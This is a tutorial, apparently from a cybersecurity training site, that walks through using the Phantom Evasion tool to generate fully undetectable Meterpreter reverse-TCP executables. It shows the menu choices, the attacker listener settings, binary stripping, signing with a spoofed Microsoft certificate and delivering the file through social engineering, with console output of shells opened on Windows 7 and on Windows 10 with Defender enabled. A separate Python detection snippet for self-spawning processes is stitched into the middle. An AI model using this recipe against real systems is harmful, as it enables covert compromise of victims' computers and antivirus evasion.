Bypass antivirus detection With Phantom Payloads

According to ethical hacking courses, Metasploit is the most popular tool used in pentesting. Metasploit tries to find weaknesses across your local network before an attacker does, and it is the most common tool attackers use to test the security of an operating system. In Kali Linux, Metasploit comes pre-installed with many payloads that are used to generate malicious executables for different platforms. Today, however, we will show a tool called Phantom Evasion, which is used to generate FUD (Fully Undetectable) executables from msfvenom payloads, as demonstrated in the ethical hacking courses offered by the International Institute of Cyber Security. According to its developer, the main aim of Phantom Evasion is to bypass antivirus detection, or in other words, antivirus evasion.

  • Phantom Evasion has been tested on Kali Linux 2018.4 (amd64).
  • To clone it, type git clone https://github.com/oddcod3/Phantom-Evasion.git
  • Type cd Phantom-Evasion
  • Type chmod u+x phantom-evasion.py
  • Type python3 phantom-evasion.py
  • On the first run it may print some errors, but the tool will still work.
                     _                 _
                 _ __ | |__   __ _ _ __ | |_ ___  _ __ ___
                | '_ \| '_ \ / _` | '_ \| __/ _ \| '_ ` _ \
                | |_) | | | | (_| | | | | || (_) | | | | | |
                | .__/|_| |_|\__,_|_| |_|\__\___/|_| |_| |_|
                |_|   / _ \ \ / / _` / __| |/ _ \| '_ \
                     |  __/\ V / (_| \__ \ | (_) | | | |
                      \___| \_/ \__,_|___/_|\___/|_| |_|
                                                        v2.0.1
    =====================================================================
  ||        [MAIN MENU]:             ||                                  ||
  ||                                 ||                                  ||
  ||    [1]  Windows modules         ||   [5]  Universal modules         ||
  ||                                 ||                                  ||
  ||    [2]  Linux modules           ||   [6]  Post-Exploitation modules ||
  ||                                 ||                                  ||
  ||    [3]  OSX modules             ||   [7]  Update check              ||
  ||                                 ||                                  ||
  ||    [4]  Android modules         ||   [0]  Exit                      ||
  ||                                 ||                                  ||
    =====================================================================

[>] Please insert option:
  • Type 1
 
[>] Please insert option: 1
  • Type 2

[+] WINDOWS MODULES INDEX:
[1] Shellcode Injection
[2] Stager
[3] Powershell / Wine-pyinstaller
[0] Back
[>] Please insert option: 2
  • Type 1

[+] WINDOWS STAGER MODULES:
[1] X86 stagers
[2] X64 stagers
[0] Back
[>] Please insert option: 1
  • Type 3

[+] WINDOWS x86 STAGER MODULES:
[1] C meterpreter/reverse_TCP VirtualAlloc (C)
[2] C meterpreter/reverse_TCP VirtualAlloc NoDirectCall GPAGMH (C)
[3] C meterpreter/reverse_TCP HeapAlloc (C)
[4] C meterpreter/reverse_TCP HeapAlloc NoDirectCall GPAGMH (C)
[5] C meterpreter/reverse_HTTP VirtualAlloc (C)
[6] C meterpreter/reverse_HTTP VirtualAlloc NoDirectCall GPAGMH (C)
[7] C meterpreter/reverse_HTTP HeapAlloc (C)
[8] C meterpreter/reverse_HTTP HeapAlloc NoDirectCall GPAGMH (C)
[9] C meterpreter/reverse_HTTPS VirtualAlloc (C)
[10] C meterpreter/reverse_HTTPS VirtualAlloc NoDirectCall GPAGMH (C)
[11] C meterpreter/reverse_HTTPS HeapAlloc (C)
[12] C meterpreter/reverse_HTTPS HeapAlloc NoDirectCall GPAGMH (C)
[0] Back
  • After selecting a payload, the tool displays a description of the payload and the file type it will build.
[+] MODULE DESCRIPTION:
This Module generate and compile
32bit pure c meterpreter reverse tcp stagers.
Require msfconsole multi/handler listener
with payload set to windows/meterpreter/reverse_tcp
[>] Memory allocation type: HEAP
[>] TYPE: TCP
[>] STATIC EVASION:
Polymorphic source code
[>] DYNAMIC EVASION:
Resource consumption technique
Sandbox-aware code
[>] AUTOCOMPILE(cross platform): to EXE file
Press Enter to continue:
  • Type 192.168.1.6 (the listener's, i.e. the attacker's, IP address)
[>] Please insert LHOST: 192.168.1.6
  • Type 443 (the listener's, i.e. the attacker's, port)
[>] Please insert LPORT: 443
  • Then enter the output filename: file
[>] Please insert output filename: file
  • Type n to create only a single process on the target computer, so there is less chance of it being caught by the antivirus.
[>] Spawn Multiple Processes:
During target-side execution this will cause to spawn a maximum of 4 processes
consequentialy.
Only the last spawned process will reach the malicious section of code
while the other decoy processes spawned before will executes only random junk code
[>] Add multiple processes behaviour?(y/n): n
  • Type y
[>] Generating C meterpreter stager
[>] Compiling…
[>] Strip
strip is a GNU utility to "strip" symbols from object files.
This is useful for minimizing their file size, streamlining them for distribution.
It can also be useful for making it more difficult to reverse-engineer the compiled code.
(Lower rate of detection)
[>] Strip executable? (y/n): y
  • The above option reduces the size of the malicious file.
  • Type y
[>] Sign Executable
Online Certificate spoofer & Executabe signer (Lower rate of detection)
[>] Sign executable? (y/n): y
  • The above option signs the malicious file with the default certificate that comes with Phantom Evasion.
  • You can use your own certificate, or the Microsoft-named certificate that ships with Phantom Evasion.
  • Type y
  • Type 1
Certificates directory is not empty , use already existing certificate? (y/n): y
[1] www.microsoft.com
[2] Create new certificate
[>] Select a Certificate or create a new one: 1
  • Type 1
[>] Select a Certificate or create a new one: 1

[>] Insert sign software description (default: Notepad Benchmark Util):
[>] Signing file1.exe with osslsigncode…
[>] Succeeded
[<>] File saved in Phantom-Evasion folder
  • After creating the malicious file, send it to the target. Any social engineering technique can be used to trick the target.
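The "Spawn Multiple Processes" option above has a side effect a defender can look for: the same executable appears as its own parent several times in a row, and only the last process in that chain does anything real. The following is an added detection example, not code from Phantom Evasion or the original post; it walks constructed process-creation records (the field names pid, ppid and image are assumptions, not a real telemetry schema) and reports self-spawn chains of at least min_depth processes.

```python
# Added example (not Phantom Evasion's code): flag executables that spawn
# themselves in a chain, the decoy pattern of "Spawn Multiple Processes".
# Field names pid/ppid/image are assumed, not a real telemetry schema.

# Constructed process-creation events: one decoy chain, one benign browser.
EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe"},
    {"pid": 2001, "ppid": 100, "image": r"C:\Users\bob\Downloads\file.exe"},
    {"pid": 2002, "ppid": 2001, "image": r"C:\Users\bob\Downloads\file.exe"},
    {"pid": 2003, "ppid": 2002, "image": r"C:\Users\bob\Downloads\file.exe"},
    {"pid": 2004, "ppid": 2003, "image": r"C:\Users\bob\Downloads\FILE.EXE"},
    {"pid": 300, "ppid": 100, "image": r"C:\Program Files\Browser\browser.exe"},
    {"pid": 301, "ppid": 300, "image": r"C:\Program Files\Browser\browser.exe"},
]


def _same_image(a, b):
    # Windows paths are case-insensitive.
    return a["image"].lower() == b["image"].lower()


def _chain_depth(pid, by_pid, memo):
    """Consecutive ancestors (pid included) that share pid's image."""
    if pid not in memo:
        ev = by_pid[pid]
        parent = by_pid.get(ev["ppid"])
        if parent is not None and _same_image(parent, ev):
            memo[pid] = _chain_depth(parent["pid"], by_pid, memo) + 1
        else:
            memo[pid] = 1
    return memo[pid]


def self_spawn_chains(events, min_depth=3):
    """Report each maximal self-spawn chain of at least min_depth processes.
    root_pid is the first decoy; leaf_pid is the last process in the chain."""
    by_pid = {e["pid"]: e for e in events}
    memo = {}
    # Processes with a same-image child are chain interiors, not chain ends.
    interior = {e["ppid"] for e in events
                if e["ppid"] in by_pid and _same_image(by_pid[e["ppid"]], e)}
    findings = []
    for e in events:
        depth = _chain_depth(e["pid"], by_pid, memo)
        if e["pid"] in interior or depth < min_depth:
            continue
        root = e["pid"]
        for _ in range(depth - 1):
            root = by_pid[root]["ppid"]
        findings.append({"image": e["image"], "root_pid": root,
                         "leaf_pid": e["pid"], "depth": depth})
    return findings
```

The default threshold of 3 keeps ordinary browsers, which fork one level of same-image children, out of the results while still catching the four-process chain the module describes.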

Testing on the Windows platform:

  • For testing we are using Windows 7 (32-bit) with Windows Defender disabled.
  • Open the executable file on the target by pressing Enter.
  • To check the payload, you can use the Metasploit multi/handler, which comes pre-installed in Kali Linux. Open another terminal and type msfconsole.
  • Type use multi/handler
msf > use multi/handler
  • Type set LHOST 192.168.1.6 (the same value you entered in Phantom Evasion).
  • Type set LPORT 443 (the same value you entered in Phantom Evasion).
  • Type show options
msf exploit(multi/handler) > set LHOST 192.168.1.6
LHOST => 192.168.1.6
msf exploit(multi/handler) > set LPORT 443
LPORT => 443
msf exploit(multi/handler) > show options
Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.1.6      yes       The listen address (an interface may be specified)
   LPORT     443              yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target
  • Type run
msf exploit(multi/handler) > run
  • As the malicious file is already running on Windows 7 Professional 32-bit, after typing run a new session is created between the attacker and target machines.
  • Type sysinfo to check the target computer's details.
[*] Started reverse TCP handler on 192.168.1.6:443
[*] Sending stage (179779 bytes) to 192.168.1.9
[*] Meterpreter session 1 opened (192.168.1.6:443 -> 192.168.1.9:49250) at 2019-03-04 00:34:27 -0500
meterpreter > sysinfo
Computer : WIN-31VSBP3FUQT
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x86
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x86/windows
meterpreter >
  • Now you can control the target through the Meterpreter command shell.
  • For further testing we used Windows 10 Enterprise 1809 (x64) with Windows Defender enabled.
  • Open the malicious exe on the Windows 10 machine. As soon as it runs, a new session is created in multi/handler.
  • Type sysinfo to check the target computer's details.
[*] Started reverse TCP handler on 192.168.1.6:443
[*] Sending stage (179779 bytes) to 192.168.1.105
[*] Meterpreter session 2 opened (192.168.1.6:443 -> 192.168.1.105:49753) at 2019-03-04 02:26:30 -0500
meterpreter > sysinfo
Computer : DESKTOP-I9LEAU8
OS : Windows 10 (Build 17758).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
  • Now you can control the target through the Meterpreter command shell.

According to an ethical hacking researcher at the International Institute of Cyber Security, Phantom Evasion can be used to generate an initial payload, which can then be customized further to bypass other antivirus products.